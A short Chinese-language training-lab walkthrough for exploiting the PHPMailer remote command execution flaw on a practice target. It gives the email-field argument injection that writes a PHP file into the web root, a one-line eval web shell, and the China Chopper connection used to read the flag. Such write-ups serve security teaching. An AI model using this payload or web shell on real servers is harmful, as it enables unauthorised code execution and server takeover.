题目

背景介绍

安全工程师对某网站进行授权测试，发现了一个管理员留下的邮件测试页面，你能帮他完成测试吗

实训目标

1、了解PHPMailer用处；
2、了解Burp suite中Spider模块使用方法；
3、了解PHPMailer远程命令执行漏洞形成原因；
4、了解PHPMailer远程命令执行漏洞利用方法

解题方向

PHPMailer远程命令执行漏洞利用

解题步骤

启动靶场，打开链接访问，是一个显示页面，翻到底部有个邮件链接，点击链接。

看到数据提交的页面，在这里上传shell。
随便输个错误网址，让网页报个错。

可以看到是linux系统搭建的网站，所以路径我们就知道了，插shell。

1.任意用户名
2.在email写入："aaa". -OQueueDirectory=/tmp/. -X/var/www/html/wanku.php @aaa.com
3.在message写入：<?php eval($_POST[wanku]);?>

提交后，访问wanku.php页面，没有报错。
使用菜刀去连接shell，找到key.txt，得到key值。

提交key值即可，完工。